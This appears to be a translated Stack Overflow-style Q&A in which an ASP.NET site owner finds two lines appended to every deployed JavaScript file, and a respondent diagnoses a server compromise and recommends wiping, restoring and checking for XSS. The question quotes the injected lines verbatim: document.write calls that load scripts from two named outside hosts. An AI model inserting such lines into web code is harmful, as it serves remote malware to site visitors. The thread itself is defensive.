1 .net javascript asp.net security xss
我需要知道是否有任何方法可以为已部署在服务器上的JavaScript文件编写其他代码.
我遇到了ASP.NET 2.0网站的问题,它与我在某些页面上的JavaScript文件有关.问题是,当我将JavaScript文件与其他文件一起上传时,它可以正常工作,但是在一段时间(一两天)之后,JavaScript文件会被更改,并且每个文件的底部会添加两行.这两行是这样的:
document.write('<script src=http://kingsoftus.com/App_Code/tsx2.php ><\/script>');
document.write('<script src=http://eco-battery.co.uk/images/battguide.php ><\/script>');
这导致我的aspx页面从这些未知的URL加载一些东西.这个东西会导致错误,并且aspx页面不会被加载或加载错误.我怀疑服务器上有什么问题,但我需要知道是否有人(病毒或黑客)可以将这两行添加到服务器上的任何JavaScript文件中.
Mic*_*tta 10
您的服务器受到了损害.添加的链接指向恶意软件标记的网站.最安全的方法是擦除服务器并从备份恢复.如果您没有自己的服务器维护,请尽快联系那些做过的人,并告知他们感染情况.关闭服务器以避免感染访问您网站的人.
至于是什么引起了感染,一些研究可能会提出你所看到的签名的具体细节.它可能是从旧的,未修补的库到代码中的XSS漏洞,以及受感染的闪存驱动器的粗心员工.
编辑:你在评论中说你不管理服务器.虽然提供程序正在评估感染,但请评估代码是否存在可能的漏洞.这是一篇MSDN文章(如何:防止ASP.NET中的跨站点脚本).一个较旧的SO问题(开发人员在构建公共网站之前应该知道什么?)有一些很好的答案,涵盖安全方面.
| 归档时间: |
|
| 查看次数: |
1381 次 |
| 最近记录: |